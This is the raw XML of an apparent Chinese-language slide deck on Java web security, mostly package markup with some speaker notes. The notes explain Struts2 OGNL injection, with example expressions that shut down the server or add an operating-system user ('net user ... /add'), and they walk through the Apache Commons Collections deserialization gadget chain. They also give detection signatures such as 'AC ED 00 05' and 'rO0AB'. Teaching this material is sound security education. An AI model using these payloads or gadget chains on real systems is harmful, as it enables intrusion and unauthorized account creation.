
<file path=[Content_Types].xml><?xml version="1.0" encoding="utf-8"?>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">
  <Default Extension="jpeg" ContentType="image/jpeg"/>
  <Default Extension="emf" ContentType="image/x-emf"/>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
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId3"/>
    <p:sldId id="260" r:id="rId4"/>
    <p:sldId id="262" r:id="rId6"/>
    <p:sldId id="263" r:id="rId7"/>
    <p:sldId id="264" r:id="rId8"/>
    <p:sldId id="265" r:id="rId9"/>
    <p:sldId id="266" r:id="rId10"/>
    <p:sldId id="267" r:id="rId11"/>
    <p:sldId id="268" r:id="rId12"/>
    <p:sldId id="269" r:id="rId13"/>
    <p:sldId id="270" r:id="rId14"/>
    <p:sldId id="271" r:id="rId15"/>
    <p:sldId id="272" r:id="rId16"/>
    <p:sldId id="273" r:id="rId17"/>
    <p:sldId id="274" r:id="rId18"/>
    <p:sldId id="275" r:id="rId19"/>
    <p:sldId id="276" r:id="rId20"/>
    <p:sldId id="277" r:id="rId21"/>
    <p:sldId id="279" r:id="rId22"/>
    <p:sldId id="280" r:id="rId23"/>
    <p:sldId id="281" r:id="rId24"/>
    <p:sldId id="282" r:id="rId25"/>
    <p:sldId id="283" r:id="rId26"/>
    <p:sldId id="284" r:id="rId27"/>
    <p:sldId id="285" r:id="rId28"/>
    <p:sldId id="286" r:id="rId29"/>
    <p:sldId id="287" r:id="rId30"/>
    <p:sldId id="288" r:id="rId31"/>
    <p:sldId id="289" r:id="rId32"/>
    <p:sldId id="290" r:id="rId33"/>
    <p:sldId id="291" r:id="rId34"/>
    <p:sldId id="292" r:id="rId35"/>
    <p:sldId id="293" r:id="rId36"/>
    <p:sldId id="294" r:id="rId37"/>
    <p:sldId id="295" r:id="rId38"/>
    <p:sldId id="296" r:id="rId39"/>
    <p:sldId id="297" r:id="rId40"/>
    <p:sldId id="298" r:id="rId41"/>
    <p:sldId id="299" r:id="rId42"/>
    <p:sldId id="300" r:id="rId43"/>
    <p:sldId id="301" r:id="rId44"/>
    <p:sldId id="302" r:id="rId45"/>
    <p:sldId id="303" r:id="rId46"/>
    <p:sldId id="304" r:id="rId47"/>
    <p:sldId id="305" r:id="rId48"/>
    <p:sldId id="306" r:id="rId49"/>
    <p:sldId id="307" r:id="rId50"/>
    <p:sldId id="308" r:id="rId51"/>
    <p:sldId id="309" r:id="rId52"/>
    <p:sldId id="310" r:id="rId53"/>
    <p:sldId id="311" r:id="rId54"/>
    <p:sldId id="312" r:id="rId55"/>
    <p:sldId id="313" r:id="rId56"/>
    <p:sldId id="314" r:id="rId57"/>
    <p:sldId id="316" r:id="rId58"/>
    <p:sldId id="317" r:id="rId59"/>
    <p:sldId id="318" r:id="rId60"/>
    <p:sldId id="319" r:id="rId61"/>
    <p:sldId id="320" r:id="rId62"/>
    <p:sldId id="321" r:id="rId63"/>
    <p:sldId id="322" r:id="rId64"/>
    <p:sldId id="323" r:id="rId65"/>
    <p:sldId id="324" r:id="rId66"/>
    <p:sldId id="325" r:id="rId67"/>
    <p:sldId id="326" r:id="rId68"/>
    <p:sldId id="327" r:id="rId69"/>
    <p:sldId id="328" r:id="rId70"/>
    <p:sldId id="330" r:id="rId71"/>
    <p:sldId id="331" r:id="rId72"/>
    <p:sldId id="332" r:id="rId73"/>
    <p:sldId id="333" r:id="rId74"/>
    <p:sldId id="334" r:id="rId75"/>
    <p:sldId id="335" r:id="rId76"/>
    <p:sldId id="336" r:id="rId77"/>
    <p:sldId id="337" r:id="rId78"/>
    <p:sldId id="338" r:id="rId79"/>
    <p:sldId id="339" r:id="rId80"/>
    <p:sldId id="340" r:id="rId81"/>
    <p:sldId id="341" r:id="rId82"/>
    <p:sldId id="342" r:id="rId83"/>
    <p:sldId id="343" r:id="rId84"/>
    <p:sldId id="344" r:id="rId85"/>
    <p:sldId id="345" r:id="rId86"/>
    <p:sldId id="346" r:id="rId87"/>
    <p:sldId id="347" r:id="rId88"/>
    <p:sldId id="348" r:id="rId89"/>
    <p:sldId id="349" r:id="rId90"/>
    <p:sldId id="350" r:id="rId91"/>
    <p:sldId id="351" r:id="rId92"/>
    <p:sldId id="352" r:id="rId93"/>
    <p:sldId id="353" r:id="rId94"/>
    <p:sldId id="354" r:id="rId95"/>
    <p:sldId id="355" r:id="rId96"/>
    <p:sldId id="356" r:id="rId97"/>
    <p:sldId id="357" r:id="rId98"/>
    <p:sldId id="358" r:id="rId99"/>
    <p:sldId id="359" r:id="rId100"/>
    <p:sldId id="360" r:id="rId101"/>
    <p:sldId id="361" r:id="rId102"/>
    <p:sldId id="362" r:id="rId103"/>
    <p:sldId id="363" r:id="rId104"/>
    <p:sldId id="364" r:id="rId105"/>
    <p:sldId id="365" r:id="rId106"/>
    <p:sldId id="366" r:id="rId107"/>
    <p:sldId id="367" r:id="rId108"/>
    <p:sldId id="368" r:id="rId109"/>
    <p:sldId id="369" r:id="rId110"/>
    <p:sldId id="370" r:id="rId111"/>
    <p:sldId id="371" r:id="rId112"/>
    <p:sldId id="372" r:id="rId113"/>
    <p:sldId id="373" r:id="rId114"/>
    <p:sldId id="374" r:id="rId115"/>
    <p:sldId id="375" r:id="rId116"/>
    <p:sldId id="376" r:id="rId117"/>
    <p:sldId id="377" r:id="rId118"/>
    <p:sldId id="378" r:id="rId119"/>
    <p:sldId id="379" r:id="rId120"/>
    <p:sldId id="380" r:id="rId121"/>
    <p:sldId id="381" r:id="rId122"/>
    <p:sldId id="382" r:id="rId123"/>
    <p:sldId id="383" r:id="rId124"/>
    <p:sldId id="385" r:id="rId125"/>
    <p:sldId id="384" r:id="rId126"/>
    <p:sldId id="386" r:id="rId127"/>
    <p:sldId id="387" r:id="rId128"/>
    <p:sldId id="388" r:id="rId129"/>
    <p:sldId id="389" r:id="rId130"/>
    <p:sldId id="390" r:id="rId131"/>
    <p:sldId id="391" r:id="rId132"/>
    <p:sldId id="392" r:id="rId133"/>
    <p:sldId id="394" r:id="rId134"/>
    <p:sldId id="393" r:id="rId135"/>
    <p:sldId id="395" r:id="rId136"/>
    <p:sldId id="396" r:id="rId137"/>
    <p:sldId id="397" r:id="rId138"/>
    <p:sldId id="400" r:id="rId139"/>
    <p:sldId id="259" r:id="rId140"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="5143500" type="screen16x9"/>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79EC3"/>
    <a:srgbClr val="2E84A2"/>
    <a:srgbClr val="65656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howGuides="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="85" d="100"/>
          <a:sy n="85" d="100"/>
        </p:scale>
        <p:origin x="966" y="84"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="1619"/>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6.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6.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notesMaster" Target="notesMasters/notesMaster1.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3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tableStyles" Target="tableStyles.xml"/><Relationship Id="rId142" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/viewProps" Target="viewProps.xml"/><Relationship Id="rId141" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/presProps" Target="presProps.xml"/><Relationship Id="rId140" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide137.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide11.xml"/><Relationship Id="rId139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide136.xml"/><Relationship Id="rId138" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide135.xml"/><Relationship Id="rId137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide134.xml"/><Relationship Id="rId136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide133.xml"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide132.xml"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide131.xml"/><Relationship Id="rId133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide130.xml"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide129.xml"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide128.xml"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide127.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide10.xml"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide126.xml"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide125.xml"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide124.xml"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide123.xml"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide122.xml"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide121.xml"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide120.xml"/><Relationship Id="rId122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide119.xml"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide118.xml"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide117.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide9.xml"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide116.xml"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide115.xml"/><Relationship Id="rId117" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide114.xml"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide113.xml"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide112.xml"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide111.xml"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide110.xml"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide109.xml"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide108.xml"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide107.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide8.xml"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide106.xml"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide105.xml"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide104.xml"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide103.xml"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide102.xml"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide101.xml"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide100.xml"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide99.xml"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide98.xml"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide97.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0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1.xml"/></Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide10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2.xml"/></Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide10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3.xml"/></Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide10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4.xml"/></Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide10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5.xml"/></Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide10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6.xml"/></Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide10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7.xml"/></Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide10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8.xml"/></Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide10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9.xml"/></Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide10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1.xml"/></Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide1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2.xml"/></Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide1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3.xml"/></Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide1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4.xml"/></Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide1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5.xml"/></Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide1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6.xml"/></Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide1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7.xml"/></Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide1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8.xml"/></Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide1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9.xml"/></Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide1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0.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1.xml"/></Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide1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2.xml"/></Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide1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3.xml"/></Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide1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4.xml"/></Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide1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5.xml"/></Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide1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6.xml"/></Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide1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7.xml"/></Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide1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8.xml"/></Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide1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9.xml"/></Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide1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0.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1.xml"/></Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide1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2.xml"/></Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide1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3.xml"/></Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide1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4.xml"/></Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide1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5.xml"/></Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide1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6.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6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6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6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6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6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6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6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6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0.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7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1.xml"/></Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide7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2.xml"/></Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide7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3.xml"/></Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide7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4.xml"/></Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide7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5.xml"/></Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide7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6.xml"/></Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide7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7.xml"/></Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide7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8.xml"/></Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide7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9.xml"/></Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide7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0.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8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1.xml"/></Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide8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2.xml"/></Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide8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3.xml"/></Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide8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4.xml"/></Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide8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5.xml"/></Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide8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6.xml"/></Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide8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7.xml"/></Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide8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8.xml"/></Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide8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9.xml"/></Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide8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0.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9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1.xml"/></Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide9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2.xml"/></Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide9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3.xml"/></Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide9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4.xml"/></Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide9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5.xml"/></Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide9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6.xml"/></Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide9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7.xml"/></Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide9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8.xml"/></Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide9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9.xml"/></Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide9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Jsp技术是Java初级开发人员必备的技术。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>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sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>这是通过ParametersInterceptor(参数过滤器)来执行的,使用用户提供的HTTP参数调用 ValueStack.setValue()。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>OGNL处理时最终的结果就是</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>　　　　java.lang.Runtime.getRuntime().exit(1); //关闭程序,即将web程序关闭</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>　　类似的可以执行</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>　　　　java.lang.Runtime.getRuntime().exec("net user 用户名 密码 /add");//增加操作系统用户,在有权限的情况下能成功(在URL中用%20替换空格,%2F替换/)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>　　只要有权限就可以执行任何DOS命令。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>关于修补仅提供思路，具体的方法和补丁不提供了。Struts2默认后缀是action或者不写后缀，有的改过代码的可能其他后缀如.htm、.do，那么我们只要拦截这些请求进行过滤就行了。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>也就是说一些java应用的数据在网络中传输，我们把里面的序列化数据抠出来，替换成我们的payload，应用程序接收之后把payload进行反序列化，构造的恶意功能（如命令执行）就被执行了。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>实际过程中直接忽略PCA的存在，hacker先于PCB完成一些前期的交互。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>上述代码说明了反序列化的过程，Java中通过writeObject()函数对对象进行序列化，将有结构的数据转换成为无结构的二进制串。 通过readObject()函数将二进制串反序列化还原成对象。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>执行到12行时生成了一个String类型的对象。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>执行到16行已经将序列化数据写入到object.db中了，前面的四个字节AC ED 00 05开头，后面会经常用到。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>执行到24行，完成反序列化过程，将对象还原，此时对象id不同，其他均相同。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>此代码能快速的体验payload是如何构造的。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>程序1的RunInvo类，构造了一个MAP，再用它构造AnnotationInvocationHandler对象，将这个对象序列化到payload.bin中。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>程序2读取payload.bin中的数据，通过readObject()进行反序列化，代码得到执行，弹出计算器，如下图所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>从序列化数据传入readObject()开始解释为什么要依赖于这几个关键点。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>首先在序列化和反序列化的过程中，每个类都有自己的readObject与writeObject对应，很多类自己重写了自己的readObject与writeObject函数，String类有自己的readObject方式，AnnotationInvocationHandler也有自己的readObject方式。而AnnotationInvocationHandler的readObject实现调用了setValue()函数，这一特性将会被TransformedMap.decorate用到。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>TransformedMap的decorate(Map map, Transformer keyTransformer, Transformer valueTransformer)函数，会将Map {key:value}按后面两个传入的函数参数来进行转换，当key或者value改变时（调用setValue），decorate就会被触发，而Transformer可以是一个调用链ChainedTransformer。这个调用链是通过InvokerTransformer精心构造的。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>InvokerTransformer函数只需要传入方法名，参数类型，参数即可调用任意函数。通过这个函数构造调用链能够执行Runtime.exec()。而InvokerTransformer存在于Apache Commons Collections的库中，因此目标应用中需要有这个库，函数才能得到执行。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>只有InvokerTransformer依赖于Apache Commons Collections库，其他函数都是通用的java库，所以payload执行的依赖条件只需目标java应用包含了Apache Commons Collections库即可。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>其特征即为AC ED 00 05（序列化的标识）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>其特征为rO0AB(AC ED 00 05的base64值)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>目前大部分情况ACED0005在开头，特征为rO0AB。 也有可能序列化对象与其他字段混合在一起再进行base64加密，所以理论来说后面两种情况也是有可能的，只是概率较低。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>
              </a:rPr>
